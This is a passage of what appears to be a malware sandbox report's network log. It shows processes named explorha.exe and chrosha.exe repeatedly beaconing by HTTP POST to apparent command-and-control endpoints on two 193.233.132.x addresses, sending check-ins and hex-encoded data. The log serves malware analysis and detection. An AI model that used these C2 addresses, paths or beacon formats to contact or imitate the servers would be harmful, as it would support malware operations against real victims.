                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.683063984 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.684029102 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.931834936 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      187192.168.2.550027193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:47.902400970 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.153949022 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      188192.168.2.550028193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.163368940 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.413213968 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      189192.168.2.550029193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.315152884 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.559663057 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.561558008 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.815291882 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      190192.168.2.550030193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:48.777595997 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.022965908 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      191192.168.2.550031193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.178529024 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.426326036 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.427573919 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.680027008 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      192192.168.2.550032193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.278162003 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.534044027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      193192.168.2.550033193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.646121025 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:49.889524937 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      194192.168.2.550034193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.039347887 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.283154011 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.284434080 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.533574104 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      195192.168.2.550035193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.143151999 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.396807909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      196192.168.2.550036193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.758999109 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.004717112 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      197192.168.2.550037193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:50.897447109 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.147028923 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.148555994 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.400620937 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      198192.168.2.550038193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.255101919 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
